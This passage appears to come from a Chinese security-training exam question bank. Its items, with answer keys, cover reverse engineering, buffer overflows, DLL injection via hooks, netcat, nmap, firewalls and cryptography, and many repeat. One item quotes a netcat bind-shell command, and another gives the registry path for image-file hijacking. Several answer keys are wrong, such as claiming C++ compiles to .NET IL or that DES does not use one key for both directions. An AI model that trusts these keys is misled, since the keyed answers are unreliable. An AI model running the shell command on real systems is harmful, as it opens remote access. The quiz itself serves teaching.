C、 WinDbg

D、 Process Monitor

标准答案: B

19、在OD工具中,单步步过,单步步入的快捷键分别是什么?

A、 F8 F9

B、 F8 F7

C、 F7 F8

D、 F9 F7

标准答案: B

20、程序的返回值一般保存在以下哪个寄存器中?

A、 eax

B、 ebx

C、 ecx

D、 edx

标准答案: A

21、以下哪项不属于病毒的静态分析?

A、 采用反病毒引擎扫描

B、 计算哈希值

C、 查找字符串

D、 使用沙箱

标准答案: D

22、以下哪项不属于病毒的动态分析?

A、 使用沙箱

B、 行为监控

C、 PE分析

D、 WinDbg调试

标准答案: C

23、Windows获取进程信息建立进程快照的函数是?

A、 Module32First

B、 CreateToolhelp32Snapshot

C、 Process32First

D、 Heap32ListFirst

标准答案: B

24、Exeinfo PE工具的主要作用是什么?

A、 代码审计

B、 程序逆向

C、 查询文件是否加壳

标准答案: C

25、OllyDbg软件主要用于静态分析程序

A、 对

B、 错

标准答案: B

26、下列哪个工具可以查看软件内核模块?

A、 CDD Explorer.exe

B、 XueTr.exe

C、 WinHex

标准答案: B

27、当返回地址被覆盖时,新地址无效,main函数执行完后会执行什么指令?

A、 重新请求

B、 重新返回

C、 重新覆盖

D、 以上都不是

标准答案: D

28、视频中,当main函数执行完毕的时候,esp的值会发生什么变化?

A、 需认为设定为请求地址

B、 需认为设定为返回地址

C、 自动变成返回地址的下一个位置

D、 自动变成返回地址

标准答案: C

29、课程中,在0x00401005的地址处,再次利用什么功能,能够找到调用main函数的位置了?

A、 平行引用

B、 交叉引用

C、 跳位引用

D、 覆盖引用

标准答案: B

30、缓冲区溢出漏洞的原理,它就是因为我们输入了过长的字符,而缓冲区本身又没有有效的验证机制,导致过长的字符将返回地址覆盖掉了

A、 对

B、 错

标准答案: A

31、这样当CALL执行完后,程序再将该地址出栈,这样就能够知道下一步应该执行哪条指令,该地址称为?

A、 请求地址

B、 返回地址

C、 重复地址

D、 目标地址

标准答案: B

32、关于编写MessageBox()的调用过程中,下列说法错误的是?

A、 MessageBox()这个函数编写过程中,需要包含4个参数

B、 MessageBox()这个函数这个ApI函数包含有四个参数,其中可以给第一和第四个参数赋给0值

C、 编写该函数的调用过程中需要将两个参数中包含的字符串转换为十六进制

D、 编写该函数的调用过程中需要将两个参数中包含的字符串转换为ASCII码

标准答案: C

33、下列说法错误的是?

A、 MessageBoxA这个函数,它位于user32.dll

B、 所有的Win32程序都会自动加载kernel32.dll

C、 为了正常退出程序,还需要使用ExitProcess

D、 为了显示对话框,需要ExitProcess使用这个函数

标准答案: D

34、0x0012FFFF为系统默认的栈的底端

A、 对

B、 错

标准答案: A

35、关于W32Dasm的说法正确的是?

A、 W32Dasm是一款逆向分析软件,是一款比IDA Pro更为流行的软件

B、 W32Dasm是一款逆向分析软件,被誉为破解界的“屠龙刀”

C、 W32Dasm是一款逆向分析软件,因此其本身是不存在任何漏洞的

D、 W32Dasm这款逆向分析工具,但不是一个静态反汇编工具。

标准答案: B

36、MS06-040漏洞指的是?

A、 远程代码执行漏洞

B、 NetpwPathCanonicalize()函数存在着缓冲区溢出的缺陷

C、 心脏滴血漏洞

D、 远程桌面执行漏洞

标准答案: D

37、课程中的程序对字符串的长度限定是unicode的0x411个字符,也就是多少个字节?

A、 0x822

B、 0x823

C、 0x722

D、 2的36次方

标准答案: A

38、text:7517FC92 cmp esi, ebx 该代码表示的意思是 验证参数Source的长度是否大于0x411。

A、 对

B、 错

标准答案: A

39、(课程中,删掉)ecx中保存的是哪的地址?

A、 缓冲区结束位置的地址

B、 缓冲区中间位置的地址

C、 缓冲区起始位置的地址

D、 没有任何地址

标准答案: C

40、函数CanonicalizePathName()是不能够被直接调用的。

A、 对

B、 错

标准答案: A

41、Winamp是一款什么软件?

A、 Winamp是一款用于研究栈溢出的软件

B、 Winamp是一款音乐播放软件

C、 Winamp是一款视频播放软件

D、 Winamp是一款用于研究代码漏洞的软件

标准答案: B

42、whatsnew.txt文件位于Winamp文件夹中,保存内容是

A、 软件的更新历史信息

B、 软件的日志信息

C、 软件的备忘信息

D、 软件的回收信息

标准答案: A

43、视频中程序程序使用的是call esp的方法,那么esp所保存的地址是?

A、 0x00BDEDF0

B、 0x00BDEDE0

C、 0x00BDEDE4

D、 0x00BDEDE8

标准答案: D

44、以下哪种情况会造成整数溢出?

A、 inputTest:65535 ,outputTest:65535

B、 inputTest:65539,outputTest:65539

C、 inputTest:65536,outputTest:1

D、 inputTest:65537,outputTest:1

标准答案: D

45、32位的无符号整数可以表示的整数范围是:0-2的16次方-1。

A、 对

B、 错

标准答案: B

46、下列说法错误的是?

A、 无符号整数的下溢和上溢过程会触发安全性

B、 符号问题会触发安全性

C、 在高位数的整数复制到低位数的整数的时候会触发安全性

D、 整数在内存里面保存在一个固定长度的空间内,它能存储的最大值就是不固定

标准答案: D

47、函数sub_40366F一共有几个局部变量,几个参数?

A、 7,0

B、 7,4

C、 7,9

D、 4,7

标准答案: B

48、当代码接下来执行到0x004017BC的位置,会发现改代码的功能是?

A、 循环

B、 覆盖

C、 赋值

D、 清除

标准答案: A

49、krnln.fnr这个文件是加了壳,通过什么定律可以进行脱壳?

A、 ESP定律

B、 CALL定律

C、 main定律

D、 0x02定律

标准答案: A

50、 API函数都保存在操作系统提供的什么文件中?

A、 esp

B、 dat

C、 DLL

D、 exe

标准答案: C

1

​ 首页 课程中心 考试中心 测验日志 帮助中心

考试记录 > 查看考题

民航竞赛-客户端安全3

考试时间:2018-08-01 23:00:00–2018-08-01 23:30:00 考试内容:全部

考试说明:民航竞赛-客户端安全3

一、单项选择题

1、这样当CALL执行完后,程序再将该地址出栈,这样就能够知道下一步应该执行哪条指令,该地址称为?

A、 请求地址

B、 返回地址

C、 重复地址

D、 目标地址

标准答案: B

2、关于编写MessageBox()的调用过程中,下列说法错误的是?

A、 MessageBox()这个函数编写过程中,需要包含4个参数

B、 MessageBox()这个函数这个ApI函数包含有四个参数,其中可以给第一和第四个参数赋给0值

C、 编写该函数的调用过程中需要将两个参数中包含的字符串转换为十六进制

D、 编写该函数的调用过程中需要将两个参数中包含的字符串转换为ASCII码

标准答案: C

3、下列说法错误的是?

A、 MessageBoxA这个函数,它位于user32.dll

B、 所有的Win32程序都会自动加载kernel32.dll

C、 为了正常退出程序,还需要使用ExitProcess

D、 为了显示对话框,需要ExitProcess使用这个函数

标准答案: D

4、0x0012FFFF为系统默认的栈的底端

A、 对

B、 错

标准答案: A

5、关于W32Dasm的说法正确的是?

A、 W32Dasm是一款逆向分析软件,是一款比IDA Pro更为流行的软件

B、 W32Dasm是一款逆向分析软件,被誉为破解界的“屠龙刀”

C、 W32Dasm是一款逆向分析软件,因此其本身是不存在任何漏洞的

D、 W32Dasm这款逆向分析工具,但不是一个静态反汇编工具。

标准答案: B

6、MS06-040漏洞指的是?

A、 远程代码执行漏洞

B、 NetpwPathCanonicalize()函数存在着缓冲区溢出的缺陷

C、 心脏滴血漏洞

D、 远程桌面执行漏洞

标准答案: D

7、课程中的程序对字符串的长度限定是unicode的0x411个字符,也就是多少个字节?

A、 0x822

B、 0x823

C、 0x722

D、 2的36次方

标准答案: A

8、text:7517FC92 cmp esi, ebx 该代码表示的意思是 验证参数Source的长度是否大于0x411。

A、 对

B、 错

标准答案: A

9、(课程中,删掉)ecx中保存的是哪的地址?

A、 缓冲区结束位置的地址

B、 缓冲区中间位置的地址

C、 缓冲区起始位置的地址

D、 没有任何地址

标准答案: C

10、函数CanonicalizePathName()是不能够被直接调用的。

A、 对

B、 错

标准答案: A

11、Winamp是一款什么软件?

A、 Winamp是一款用于研究栈溢出的软件

B、 Winamp是一款音乐播放软件

C、 Winamp是一款视频播放软件

D、 Winamp是一款用于研究代码漏洞的软件

标准答案: B

12、whatsnew.txt文件位于Winamp文件夹中,保存内容是

A、 软件的更新历史信息

B、 软件的日志信息

C、 软件的备忘信息

D、 软件的回收信息

标准答案: A

13、视频中程序程序使用的是call esp的方法,那么esp所保存的地址是?

A、 0x00BDEDF0

B、 0x00BDEDE0

C、 0x00BDEDE4

D、 0x00BDEDE8

标准答案: D

14、以下哪种情况会造成整数溢出?

A、 inputTest:65535 ,outputTest:65535

B、 inputTest:65539,outputTest:65539

C、 inputTest:65536,outputTest:1

D、 inputTest:65537,outputTest:1

标准答案: D

15、32位的无符号整数可以表示的整数范围是:0-2的16次方-1。

A、 对

B、 错

标准答案: B

16、下列说法错误的是?

A、 无符号整数的下溢和上溢过程会触发安全性

B、 符号问题会触发安全性

C、 在高位数的整数复制到低位数的整数的时候会触发安全性

D、 整数在内存里面保存在一个固定长度的空间内,它能存储的最大值就是不固定

标准答案: D

17、函数sub_40366F一共有几个局部变量,几个参数?

A、 7,0

B、 7,4

C、 7,9

D、 4,7

标准答案: B

18、当代码接下来执行到0x004017BC的位置,会发现改代码的功能是?

A、 循环

B、 覆盖

C、 赋值

D、 清除

标准答案: A

19、krnln.fnr这个文件是加了壳,通过什么定律可以进行脱壳?

A、 ESP定律

B、 CALL定律

C、 main定律

D、 0x02定律

标准答案: A

20、 API函数都保存在操作系统提供的什么文件中?

A、 esp

B、 dat

C、 DLL

D、 exe

标准答案: C

21、在操作系统中安装全局钩子以后,只要目标进程符合我们所设定的条件,全局钩子的DLL文件会被操作系统自动或强行地加载到该进程中。

A、 对

B、 错

标准答案: A

22、“开启监控”按钮的功能是首先需要获取欲注入的DLL程序的完整路径,也就是当前目录。

A、 对

B、 错

标准答案: A

23、关闭监控”按钮的功能是查找explorer.exe进程中是否含有我们所注入的什么文件?

A、 kernel32.dll

B、 CreateProcessHook.dll

C、 HookCreateProcess.dll

D、 LoadLibraryA.dll

标准答案: C

24、因为程序使用了getcwd()函数获取当前路径,所以需要添加头文件direct.h,而为了实现进程的遍历,但不需要包含头文件Tlhelp32.h。

A、 对

B、 错

标准答案: B

25、CRC32查杀方式比传统的查杀方式的查杀效率高一些。

A、 对

B、 错

标准答案: B

26、熊猫病毒特征码的字节是多少个字节?

A、 32

B、 33

C、 16

D、 24

标准答案: A

27、U盘病毒的文件偏移是?

A、 0x192

B、 x1920

C、 0x1920

D、 0x190

标准答案: C

28、如果计算机已经中了病毒,现在我们拥有了该病毒的特征码,那么我们能否修复该病毒给计算机造成的危害。

A、 对

B、 错

标准答案: B

29、有些病毒为了实现网站劫持,使其重定向到自己指定的地址,那么为了达到这一目的,通常做法是Windows系统里位于%SystemRoot%\system32\drivers目录下的hosts文件。

A、 对

B、 错

标准答案: B

30、无论程序是用C#,还是C++,或是VB编写,最终都被编译为.NET的中间语言IL。

A、 对

B、 错

标准答案: A

31、计算机病毒的会造成哪些危害?

A、 磁盘破坏

B、 计算机用户的伤害

C、 CPU的损坏

D、 程序和数据的破坏

标准答案: D

32、在Windows 32 位操作系统中,其EXE文件中的特殊表示为?

A、 MZ

B、 PE

C、 NE

D、 LE

标准答案: B

33、能够感染EXE、COM 文件的病毒属于?

A、 网络型病毒

B、 蠕虫型病毒

C、 文件型病毒

D、 系统引导型病毒

标准答案: C

34、下列描述不正确的是?

A、 不存在能够防治未来的所有病毒的发病毒软、硬件

B、 现在的杀毒软件能够查杀未知病毒

C、 病毒产生在前,反病毒手段相对滞后

D、 数据备份是防治数据丢失的重要手段

标准答案: B

35、下列预防计算机病毒的注意事项中,错误的是?

A、 不使用网络,以免中毒

B、 重要资料经常备份

C、 备好启动盘

D、 尽量避免在无防毒软件机器上使用可移动储存介质

标准答案: A

36、什么是敲竹杠病毒?

A、 对电脑设置开机密码类,再提供密码索要费用的木马病毒

B、 盗取数据信息的病毒

C、 破坏计算机运行的病毒

D、 伪装监控病毒

标准答案: A

37、在OD工具调试中,JE跳转不成立,不改变病毒运行顺序的情况下,可以把ZF标志位修改为1。

A、 对

B、 错

标准答案: A

38、EAX寄存器保存的是操作字符串的地址信息。

A、 对

B、 错

标准答案: A

39、病毒屏蔽杀毒软件后可以用改文件名的方法来进行绕过。

A、 对

B、 错

标准答案: A

40、注册表映像劫持的路径是?

A、 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

B、 HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run

C、 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\

D、 HKCU\Software\Microsoft\Windows\CurrentVersion\Run

标准答案: C

41、CreateToolhelp32Snapshot函数解析正确的是?

A、 检索系统快照中遇到的第一个进程的信息

B、 搜索一个文件或子目录名匹配一个特定名称的目录

C、 获取进程信息为指定的进程、进程使用的堆、线程建立一个快照

D、 函数终止指定进程及其所有线程

标准答案: C

42、每个函数都有自己的栈帧,每个函数都是利用自己的栈帧空间保存全局变量与函数的调用关系。()

A、 对

B、 错

标准答案: B

43、如果能控制进程的执行流程,不能够执行想要执行的指令,达到我们目的的指令序列就叫做shellcode。()

A、 对

B、 错

标准答案: B

44、下面是漏洞代码,分析的结果:创建一个ba数组,将ba内容加密,修改ba内容,为ba解密。()

A、 对

B、 错

标准答案: B

45、缓冲区溢出漏洞的原理,它就是因为我们输入了过长的字符,而缓冲区本身又没有有效的验证机制,导致过长的字符将返回地址覆盖掉了

A、 对

B、 错

标准答案: A

46、0x0012FFFF为系统默认的栈的底端

A、 对

B、 错

标准答案: A

47、text:7517FC92 cmp esi, ebx 该代码表示的意思是 验证参数Source的长度是否大于0x411。

A、 对

B、 错

标准答案: A

48、函数CanonicalizePathName()是不能够被直接调用的。

A、 对

B、 错

标准答案: A

49、32位的无符号整数可以表示的整数范围是:0-2的16次方-1。

A、 对

B、 错

标准答案: B

50、在操作系统中安装全局钩子以后,只要目标进程符合我们所设定的条件,全局钩子的DLL文件会被操作系统自动或强行地加载到该进程中。

A、 对

B、 错

标准答案: A

1、下列哪项不是信息安全的定义?

A、 数据安全,确保数据不会被非法入侵者读取或破坏

B、 程序安全,重视软件开发过程的品质及维护

C、 系统安全,维护计算机系统正常操作

D、 环境安全,管理员不能用弱口令

标准答案: D

2、下列哪项不是正确的防止被骗操作?

A、 在淘宝购买东西应该使用旺旺交流

B、 商家发送的发票文件,直接打开

C、 商品多次修改价格,应该提高警惕

D、 对商家发送的文件进行查杀

标准答案: B

3、下列选项中对DES加密算法描述不正确的是?

A、 以64位为分组对数据进行加密

B、 其密钥长度为56位

C、 运用相同算法进行加密解密

D、 DES加密算法为最安全的加密算法之一

标准答案: D

4、下列关于标准防火墙的描述错误的是?

A、 防火墙安全规则遵循从上到下匹配原则,一旦有一条匹配,剩余的规则就不匹配了

B、 所有的规则都没有匹配到,数据包将丢弃

C、 安全过滤规则主要包含源、目的地址和端口

D、 防火墙的主要功能是防止病毒等恶意程序的传输

标准答案: D

5、对于“access-list 101 primit tcp any host 198.78.46.8 eq www”的acl规则理解正确的是?

A、 匹配顺序为101,允许ip为198.78.46.8的主机访问任何外部ip

B、 规则强度为101,不允许TCP连接,禁止所有主机对198.78.46.8的www服务进行访问

C、 匹配顺序为101,允许TCP连接,所有主机对198.78.46.8的www服务进行访问

D、 匹配顺序为101,允许TCP连接,禁止禁止所有主机对198.78.46.8的www服务进行访问

标准答案: C

6、下列那些SMTP命令是用来发送邮件的Envelop的?

A、 HELO xxx.com

B、 MAIL FROM :<>和RCPT TO:<>

C、 DATA

D、 AUTH LOGIN

标准答案: B

7、下列关于信息安全保障的描述错误的是?

A、 信息安全保障的是核心业务,信息安全保障是为了支撑业务的正常运行

B、 信息系统安全的保障是在整个信息系统的生命周期中

C、 要确保信息系统的保密性、完整性、和可用性

D、 信息安全保障策略的制定没办法考虑到地震、海啸等大自然的不可抗力

标准答案: D

8、下列对于下一代防火墙的描述错误的是?

A、 将访问控制对象从网络层、传输层延伸到应用层

B、 下一代防火墙能够识别应用和内容

C、 下一代防火墙可以限制用户是否能在上班时间访问娱乐社交软件

D、 下一代防火墙已经丢弃了传统防火墙的工作模式

标准答案: D

9、下列关于KDC的描述错误的是?

A、 KDC是秘钥分发中心

B、 网络中所有客户机和服务器都信任KDC,并使用KDC验证用户身份

C、 KDC是由认证服务和票据授予服务组成

D、 认证服务的作用主要是生成两个主题之间通信的票据

标准答案: D

10、下列哪项不是防火墙常见的工作方式?

A、 包过滤

B、 状态监测

C、 透明接入

D、 应用代理

标准答案: C

11、下列选项中关于ACL规则的匹配原则描述不正确的是?

A、 防火墙安全规则遵循从上到下匹配的原则

B、 如果所有的规则都没有匹配到,数据包将被丢弃

C、 安全过滤规则只包含源、目的地址和端口

D、 防火墙安全规则匹配时一旦有一条匹配,剩余的都不再进行匹配

标准答案: C

12、下列选项中关于防火墙的透明部署方式描述错误的是?

A、 内外网在一个网段内

B、 优点是直接串联到链路上,不改变原有的网络IP地址配置

C、 缺点是像玻璃一样,屋内屋外一览无余

D、 透明模式即用户可以访问到网络安全设备

标准答案: D

13、下列关于nc -lp 31337 -e /bin/bash 的理解错误的是____。

A、 打开并监听本地端口31337,等待主机连接

B、 -e 代表将/bin/bash 绑定在此端口上

C、 这是使用netcat反弹shell的命令

D、 使用的是反向连接方式反弹shell

标准答案: D

14、下列选项中最复杂的密码是____。

A、 博福特密码

B、 弗纳姆密码

C、 滚动密钥密码

D、 转轮密码

标准答案: D

15、下列关于Netcat的操作的描述错误的是____。

A、 nc -G 追踪连接可用于网络排查

B、 -o 会将显示的内容输出到一个指定文件

C、 -h 打开nc的帮助文档

D、 -l 表示打ip列表

标准答案: D

16、下列关于nc -lp 31337 -e /bin/bash 的理解错误的是____。

A、 打开并监听本地端口31337,等待主机连接

B、 -e 代表将/bin/bash 绑定在此端口上

C、 这是使用netcat反弹shell的命令

D、 使用的是反向连接方式反弹shell

标准答案: D

17、下列哪些功能不是netcat能做到的?

A、 在两台主机之间通信

B、 在两台主机之间传输文件

C、 反弹主机shell

D、 漏洞扫描以及利用

标准答案: D

18、下面对于”nc www.google.com 80″的描述错误的是?

A、 连接google.com 开放的80端口

B、 可以获取一些关于主机的信息

C、 可以发送http请求包来访问网站

D、 不会连接成功

标准答案: D

19、使用____命令检测目标主机的端口开放情况。

A、 nmap –version

B、 nmap

C、 nmap -A -v

D、 nmap -sP 192.168.0.0/24

标准答案: B

20、下列对于“nmap 10.73.31.0/24 –exclude 10.73.31.184”的理解错误的是____。

A、 nmap 10.73.31.0/24 是指扫描该IP的整个C段网络

B、 nmap 10.73.31.0/24 等于 nmap 10.73.31.*

C、 –exclude 10.73.31.184 是指 在扫描整个C段网络时 排除10.73.31.184这个IP

D、 扫描结果会包含主机操作系统信息

标准答案: D

21、只进行主机存活探测,使用____命令。

A、 nmap –version

B、 nmap

C、 nmap -A -v

D、 nmap -sP 192.168.0.0/24

标准答案: D

22、密码术中永恒的两大原则是____。

A、 替换 换位

B、 混乱 换位

C、 混乱 扩散

D、 扩散 替换

标准答案: A

23、下列关于DES算法描述不正确的是____。

A、 密钥较短

B、 加解密速度快

C、 适用于加密大量数据的场合

D、 加解密的密钥相同

标准答案: D

24、下列选项中不属于密码对信息的保护的是____。

A、 信息的传输

B、 信息的存储

C、 信息的交换

D、 信息的发布

标准答案: D

25、下列____不属于单钥体制的密码系统。

A、 代数作业体制

B、 序列密码体制

C、 堆成密码体制

D、 分组密码体制

标准答案: C

26、____表示邮件服务器返回代码为临时性失败(xx代表任意数)。

A、 2xx

B、 3xx

C、 4xx

D、 5xx

标准答案: C

27、买家称购买商品异常后的正确操作是立即咨询官方客服。

A、 正确

B、 错误

标准答案: A

28、网上陌生人给你发送补丁文件正确的操作是不下载文件。

A、 错误

B、 正确

标准答案: B

29、下列对于白帽、黑帽和灰帽黑客描述错误的是____。

A、 白帽黑客帮助企业进行安全测试

B、 黑帽黑客是自己对网站进行攻击

C、 灰帽黑客是不会恶意的使用漏洞进行攻击

D、 黑客所有的一切操作都是违法的

标准答案: D

30、白帽黑客正确的的行为是不可以传播、共享数据。

A、 错误

B、 正确

标准答案: B

31、用于电子邮件传输网络标准的协议是

A、 SMTP

B、 PPTP

C、 MLTP

标准答案: A

32、能支持非ASCII码字符文本格式的标准是

A、 SMTP

B、 MIME

C、 JSON

标准答案: B

33、1995年推出了新ESMTP的RFC号是

A、 RFC5321

B、 RFC1869

C、 RFC821

标准答案: B

34、SMTP只支持7位ASCII码,且不能传输二进制文件

A、 对

B、 错

标准答案: A

35、第一次是谁提出现代密码学编码原则的

A、 1884年Kerchoffs提出加密规则

B、 1883年Kerchoffs提出编码原则

C、 1884年Kerchoffs提出编码算法

D、 1883年Kerchoffs提出规则加密

标准答案: B

36、目前流行的加密算法有DES,AES,RSA,MD5,SHA1?

A、 对

B、 错

标准答案: A

37、常见非对称式算法有?

A、 DES,3DES,ASE

B、 ASE,RSA,ECC,MD5,SHA,DSA

C、 DES,AES,RSA,MD5,SHA1

D、 RSA,DSA,ECC

标准答案: D

38、DES的加密长度是多少位?

A、 128位

B、 112或者128位

C、 128、192、256位

D、 56位

标准答案: D

39、物理生活中密码泄露通常是什方式泄露

A、 网络上面使用弱口令被通过碰撞方式泄露

B、 公共场合免费WIFI等

C、 钓鱼网站

D、 以上全对

标准答案: B

40、使用什么协议浏览网页更加安全

A、 ftp

B、 http

C、 https

D、 tcp/ip

标准答案: C

41、使用最正确的方式防范个人信息安全的是?

A、 在网络中使用多个复杂密码提高自身密码安全性防止服务商泄露

B、 在网络中使用多个复杂密码提高自身密码安全性

C、 使用notepad记录常用密码放到电脑

D、 使用复杂密码定期修改,选择可靠平台,不主动透露个人信息

标准答案: D

42、及时发现项目BUG进行日志监控,哪些操作最合理正确?

A、 查看服务器配置的WEB日志进行监控

B、 使用安全防护软件进行日志扫描

C、 能在用户发生错误的那一刻,通过日志发现那些黑客在攻击我们

D、 使用常见的日志检查工具,配合debug模式进行测试查看是否控制严格

标准答案: D

43、如何做好日常防护防范

A、 不信任客户端提交过来的任何数据

B、 不接受客户端提交过来的任何数据

C、 客户端提交过来的数据严格检查,做好规则

D、 不理客户端提交过来的数据该怎么提交就怎么提交

标准答案: C

44、网络中使用防火墙起到什么作用?

A、 防止电脑报错

B、 防止流量异常

C、 防止黑客

D、 保护内部敏感信息资源,防止内部泄露

标准答案: D

45、网络传输五元组以下那个正确?

A、 目的端口,源端口,应用层,传输层,物理层

B、 原Mac,目的MAC,数据链路层,网络层,会话层

C、 目的IP,原IP,协议号,目的端口,原端口,会话层

D、 目的IP,原IP,协议号,目的端口,原端口

标准答案: D

46、防火墙访问控制列表”允许任何流量通过”规则

A、 access-list 1 deny 172.16.4.13 0.0.0.0

B、 access-list 2 permit 172.16.0.0 0.0.255.255

C、 access-list 3 permit 0.0.0.0 255.255.255.255

D、 access-list 3 permit 0.0.0.0 255.0.0.255

标准答案: C

47、透明模式和桥模式说法正确的有?

A、 内外网在一个网段内

B、 有点是直接串联到链路上,不改变原有的网络IP地址

C、 缺点是像玻璃一样,屋内屋外一览无余

D、 以上全对

标准答案: D

48、虚拟化主机安全?

A、 云存储安全,云存储杀毒,访问控制,源数据备份

B、 vVirus,vFw,vSwitch,vIDS,运维审计,安全加固

C、 云安全管理平台,SDN+VxLan,安全域划分,网络边界防护,运维审计

D、 温、温度,接地,防静电,消防

标准答案: B

49、什么技术可以伪造任意电话号码?

A、 钓鱼电话

B、 冒充电话

C、 伪基站技术

D、 网络电话

标准答案: C

50、劫持到其他网页和游戏广告是从那个入口被劫持的

A、 链接网络

B、 网络接口

C、 路由器

D、 电脑

标准答案: C

1、路由器有哪几种加密方式

A、 WEP,WEPA-PSD,WPA2-PSK,WPA-PSK+WPA2-PSK

B、 WEP,WEPA-PSA,WPA2-PSK,WPA-PSK

C、 WEP,WEPA-PSS,WPA2-PSK,WPA-PSK+WPA2-PSK

D、 WEP,WEPA-PSK,WPA2-PSK,WPA-PSK+WPA2-PSK

标准答案: D

2、黑客劫持DNS会出现那些状况

A、 网络浏览网页变快

B、 网络浏览网页速度明显变慢

C、 网络加速

D、 网络浏览网页更加安全

标准答案: B

3、网购诈骗流程操作?

A、 交易失败-虚假客户-误导提示-钓鱼链接-网银授权操作

B、 交易失败-虚假客户-误导提示-网银授权操作-洗劫卖家网银账号

C、 交易失败-误导提示-钓鱼链接-网银授权操作-洗劫卖家网银账号

D、 交易失败-虚假客户-误导提示-钓鱼链接-网银授权操作-洗劫卖家网银账号

标准答案: D

4、邮件收发环境包括()来完全组合:

A、 防火墙,DMZ隔离区,网络中间节点

B、 邮件服务器,邮件客户端

C、 数据库,Appliance,云端

D、 防火墙,DMZ隔离区,Appliance,网络中间节点,邮件服务器,邮件客户端,数据库,云端

标准答案: D

5、邮件投递过程中顺序正确的是():

A、 MUA编辑邮件,MSA编辑完发送,MTA邮件传输,MDA邮件投递

B、 MSA编辑完发送,MDA邮件投递

C、 邮件用户代理,邮件递交代理,邮件投递代理,邮件传输代理

D、 编辑邮件,MTA邮件传输,邮件递交代理,邮件投递代理

标准答案: A

6、利用 DNS查找目的地址,记录说明错误的是():

A、 A记录:主机到IP地址的映射

B、 CNAME记录:查找主机别名

C、 MX记录:Domain到MTA的映射

D、 CNAME记录:查找IP别名

标准答案: D

7、DNS记录类型说明错误的是():

A、 CNAME:别名到域名的映射

B、 PTR:正向DNS解析

C、 MX:实现主机名到接收邮件的主机名映射

D、 SPE:Mail Client简单的认证方式

标准答案: B

8、使用nslookup命令查询网址的MX记录,preference数字越小代表优先级低,越大优先级越高。()

A、 对

B、 错

标准答案: B

9、论文《计算机安全威胁监控与监视》提出的监视入侵活动的思路是

A、 利用日志作为审计数据监视入侵活动

B、 利用流量作为审计数据监视入侵活动

C、 利用恶意代码作为审计数据监视入侵活动

标准答案: A

10、IDS设备部署的关键是

A、 关键是查杀恶意代码

B、 关键是设备的正确配置

C、 关键是阻断攻击流量

D、 关键是日常安全事件的跟踪与处理

标准答案: D

11、入侵检测系统可以检测存在的恶意代码

A、 对

B、 错

标准答案: B

12、沙箱是通过哪种方式检测入侵

A、 逆向分析

B、 虚假目标

C、 行为表现

D、 流量检测

标准答案: C

13、把IDS串联在保护目标前就成了IPS

A、 对

B、 错

标准答案: B

14、攻击者利用中间人技术监听网络数据流量是破坏了信息安全三要素的哪一点?()

A、 保密性

B、 完整性

C、 可用性

D、 抗抵赖性

标准答案: A

15、Web服务器遭到ddos攻击,Web服务中断是破坏了信息安全三要素的哪一点?()

A、 保密性

B、 完整性

C、 可用性

D、 抗抵赖性

标准答案: C

16、安全保障需求的原因是价值风险。

A、 对

B、 错

标准答案: A

17、我国信息安全的标准是等级保护。

A、 对

B、 错

标准答案: A

18、密钥的传递方法有哪些?

A、 物理传递

B、 旧密钥加密新密钥

C、 加密链路

D、 对称加密

标准答案: D

19、UNIX文件的访问控制不包含下面哪一项?

A、 属主

B、 组成员

C、 root

D、 其他

标准答案: C

20、DoD(美国国防部)使用的四层分级制和权限空间不包含哪一项?

A、 绝密级

B、 隐私级

C、 秘密级

D、 机密级

标准答案: B

21、BLP模型中的“不上读,不下写”保证了数据的什么特性?

A、 安全性

B、 可用性

C、 完整性

D、 保密性

标准答案: D

22、TCP数据包报文中哪个字段不可以被利用来构成隐蔽通道?

A、 序号

B、 确认号

C、 保留字段

D、 数据迁移值

标准答案: D

23、下面那个保存密码的方式是最推荐的?

A、 脑记

B、 便签贴

C、 密码工具

D、 云笔记

标准答案: C

24、Google的GOTP采用哪一种方式做计数器?

A、 时间

B、 账号

C、 IP

D、 GPS

标准答案: A

25、HTTPS比HTTP安全,并且不会被截取到数据

A、 对

B、 错

标准答案: B

26、下列对称算法,哪个相对更安全?

A、 DES

B、 AES

C、 3DES

标准答案: B

27、1883年Kerchoffs 提出了编码的原则,是现代密码学与古密码的分界线

A、 对

B、 错

标准答案: A

28、下面关于OpenSSL心脏出血漏洞说法错误的是?

A、 OpenSSL默认端口443

B、 每次能获取到64Kb大小的信息

C、 没有任何危害

标准答案: C

29、网络全就是web安全。

A、 对

B、 错

标准答案: B

30、Des加密算法属于对称加密算法。

A、 对

B、 错

标准答案: A

31、下面不属于对称加密算法的是?

A、 DES

B、 AES

C、 hash

标准答案: C

32、数字签名能够伪造。

A、 对

B、 错

标准答案: B

33、Telnet协议是TCP/IP协议族中的一员,是Internet远程登陆服务的标准协议和主要方式。传输过程中是明文传输的。

A、 对

B、 错

标准答案: A

34、Cookie可进行简单的web用户状态认证。

A、 对

B、 错

标准答案: A

35、ORA可以协助证书作废过程。

A、 对

B、 错

标准答案: A

36、密码学的目的是?

A、 研究数据加密

B、 研究数据解密

C、 研究信息安全

D、 研究数据保密

标准答案: C

37、一个完整的密码体制,不包括以下( )要素。

A、 明文空间

B、 密文空间

C、 数字签名

D、 密钥空间

标准答案: C

38、以下关于等级保护的说法中不正确的是( )。

A、 是国家信息安全保障工作的基本制度、基本国策

B、 是开展信息安全工作的基本方法

C、 是提高国家综合竞争力的主要手段

D、 是促进信息化、维护国家信息安全的根本保障

标准答案: C

39、以下关于等级保护的说法中不正确的是:( )

A、 信息安全等级保护是对信息和信息载体按照重要性等级分级别进行保护的一种工作

B、 在中国、美国等很多国家都存在的一种信息安全领域的工作

C、 广义上为涉及到该工作的标准、产品、系统、信息等均依据等级保护思想的安全工作

D、 信息系统的等级保护工作不具有分级别保护的区别,可以统一进行防护

标准答案: D

40、以下关于等级保护工作说法不正确的是:( )

A、 信息安全等级保护工作主要是由使用方来进行,无需其他厂商、主管部门的参与

B、 等级保护是涉及技术与管理两个领域的复杂系统工程

C、 对于不同的信息系统划分不同的安全等级,提出逐级增强的安全指标基本要求

D、 信息安全等级保护建设的主要内容,就是要从“机密性、完整性以及可用性”的角度,客观评价保护对象(信息系统)的重要性

标准答案: A

41、访问网址www.1cbc.com.cn,将可能遭受( )攻击?

A、 缓冲区溢出攻击

B、 钓鱼攻击

C、 SQL注入攻击

D、 拒绝服务攻击

标准答案: B

42、钓鱼攻击具有下列选项中除了( )以外的所有特点。

